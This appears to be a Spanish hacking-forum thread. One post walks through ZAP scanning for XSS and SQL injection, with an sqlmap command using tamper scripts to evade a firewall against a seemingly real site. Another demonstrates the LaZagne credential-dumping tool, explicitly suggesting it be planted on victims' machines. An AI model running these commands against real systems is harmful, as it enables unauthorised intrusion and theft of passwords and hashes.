Navegación forzada
Fuzzer
Certificados SSL dinámicos
Soporte de tarjetas inteligentes y certificados digitales de clientes
Apoyo tomas Web
Soporte para una amplia gama de lenguajes de script
Plug-n-Hack apoyo
El soporte de autenticación y la sesión
Potente API basada en REST
Opción Automático actualización
Integrado y creciente mercado de los complementos


DESCARGA:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


La instalación la vamos a omitir porque es demasiado fácil, por ende cualquiera puede hacerlo sin ningún problema, deben tener Java instalado en su equipo para poder correr la herramienta.

Interactuando con la plataforma:


como vemos la estructura es muy detallada y va de la mano con las personas que son nuevas en experimentar la herramienta, que de por si es demasiada sencilla para todos.
como observamos en una pequeña pantalla donde nos da un mensaje de bienvenida a la herramienta nos aparece el formulario "URL a atacar", con la cual añadiremos nuestro servidor para hacer la prueba de auditoria.


Es demasiado sencillo como se los explique al momento de añadir la url le darán en atacar y automáticamente empezara el escaneo primario con el "Spider", el capturar de módulos y archivos.


Algo bueno del primer escaneo es que nos dará la lista en general del servidor con la cual nosotros mismos podemos analizar y obtener datos que quizás un escaner no pueda capturar porque a todos nos a pasado en algunas de nuestras auditorias.

Pasaremos al segundo escaneo, la cual es 100% ofensivo porque ejecutara payloads en todos los parámetros para comprobar  si son vulnerables y empezara a capturarlos en la pestaña "Alertas", cabe aclarar que el escaneo se ejecuta automáticamente cuando termina por si solo es escaneo primario de igual manera si lo cancelas.


Como bien lo dije hace momentos este segundo escaneo activo, lo que hace es añadir payloads en cada sector del servidor web en busca de un análisis positivo con un vector de ataque que lo confirmara si es vulnerable o no, con la cual nuestros resultados se irán generando en la sesión "Alertas". la cual se van a definir en una lista por categorías de Errores, en mi caso el primero en la lista son los conocidos XSS



Ahora encontramos algo mas que un simple escaneo, la cual al darle 2 clicks a nuestro enlace vulnerable en la sesión de las alertas nos parecen la ventada con la información detallada de dicha vulnerabilidad con su respectivo payload probado, de igual manera pueden añadir el suyo sin ningún problema pero haré esta prueba con el payload que ofrece zaproxy para comprobar su eficacia.


Comprobando el payload en mi caso lo haré con el navegador Mantra


Nuestro objetivo es vulnerable a un XSS, pero vamos a ver las otras vulnerabilidades que hemos encontrado, como la vulnerabilidad de  inyección SQL


De igual manera vamos a comprobar la vulnerabilidad en el navegador

Código: php
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' ORDER BY sort' at line 1SELECT * FROM biblioteca WHERE id='17'' AND estado='1'  ORDER BY sort 


Código: php
sqlmap.py -u http://www.ejemplodepagina.com.pe/portal/index.php?id=17 --tamper="space2comment,charencode.py" -v 3 --random-agent --dbs --timeout=10 --no-cast


En mi caso tuve que utilizar tamper para que mi objetivo sea testeado sin ser bloqueado por el Firewall, si deseas aprender como bypassearlo lo invito al siguiente POST:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

de igual manera podemos interactuar con las demás listas.


Pero bueno espero les haya gustado el articulo, agradecer no cuesta nada.
Saludos!
#39
Me presento de nuevo  8)

Buenos días ha todos me siento verdaderamente incomodo con algunos usuarios que me dicen que soy un copy paste en mis POST'S, cuando soy yo el mismo autor de la pagina No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, publico mis POST completos en el foro y por respeto NO mando solo la "URL" en un POST para que enlace a mi servidor web como "terceros", Espero comprendan eso y me suena absurdo poner créditos a algo que es completamente de mi autoria 8)

"Una cosa es aparentar lo que no es y otra cosa es ser"

Saludos!
#40


Saludos fieles lectores en esta oportunidad les traigo una herramienta llamado "laZagne", quise hacer un post hace tiempo de este software pero no estaba convencido de añadirlo al blog, pero cuando vi que lo habían liberado en source open en python, tanto para windows y linux  me gusto la idea de compartirlo, pero de igual manera tiene una versión en código cerrado, en este caso en un ejecutable la cual es mas fácil y acta de usar en cualquier tipo de escenario ya sea remotamente en un explotación con Metasploit, comprometiendo servidores web o  mediante ing social alojándole en la maquina de la víctima.

Descarga del código abierto:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga del ejecutable:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Primer escenario en Gnu/Linux - Kali Linux.

Descarga:

Código: php
root@kali:~ git clone https://github.com/AlessandroZ/LaZagne.git

Permisos y ejecución:
Código: php

root@kali:~/LaZagne/Linux/src# chmod 775 *
root@kali:~/LaZagne/Linux/src# python LaZagne.py




Como vemos nos aparecen una lista de módulos las cuales nos dice cada función

    chats         -  Ejecutar chats módulo
     mails         -  Ejecutar módulo mails
     all              -  Ejecutar todos los módulos
     database   -  Ejecutar base de datos
     wifi            -  Ejecutar
     sysadmin  -  Módulo Ejecutar sysadmin
     wallet        -  Módulo de cartera Run
     browsers   -  Ejecutar módulo de navegadores


En este primer escenario voy a ejecutar la opción browsers para ver los datos de credenciales de usuarios  y contraseñas que se han guardado:

Código: php
root@kali:~/LaZagne/Linux/src# python LaZagne.py browsers -v




En este segundo escenario ejecutare la opción sysadmin , de igual manera para encontrar las credenciales tanto administrativas del sistema, como otros complementos.
Código: php

root@kali:~/LaZagne/Linux/src# python LaZagne.py sysadmin -v




de igual manera podemos interactuar con las demás opciones, pero en este caso estoy utilizando una maquina virtual, en algunas características les pida que tengan la terminal ROOT para poder extraer datos de la memoria interna.

Segundo escenario en Windows 8.1

En este caso en la distro windows abriré CMD como administrador para poder tener permisos de algunas opciones como dije hace momentos, en este caso copiamos o subiremos nuestro archivo ejecutable laZagne.exe en el disco local C:



Como vemos nos aparecen las mismas funciones pero se añaden 3 mas, pero las pondré para que no se confundan:

    hats           -   Ejecutar chats módulo

    svn            -   Ejecutar el modulo svn

    all              -  Ejecutar todos los módulos

    wifi            -  Ejecutar módulos wifi

    mails         -  Ejecutar módulo mails

    windows   -  Ejecutar ventada de módulos

    database   -  Ejecutar base de datos   

    sysadmin  - Módulo Ejecutar sysadmin

    wallet        - Módulo de juegos

    browsers   - Ejecutar módulo de navegadores



Entonces utilizare la opción windows para ver los módulos del sistema que  pasaran a ser extraídos.



como hemos observado hemos dumpeado los datos  de usuario del sistema con su respectivo HASH

Ya que aquí tengo montado la conexión WIFI escogeré el modulo wifi:



Espero les aya gustado este POST, como siempre espero hallan aprendido algo nuevo este día.
Un saludo para todos!!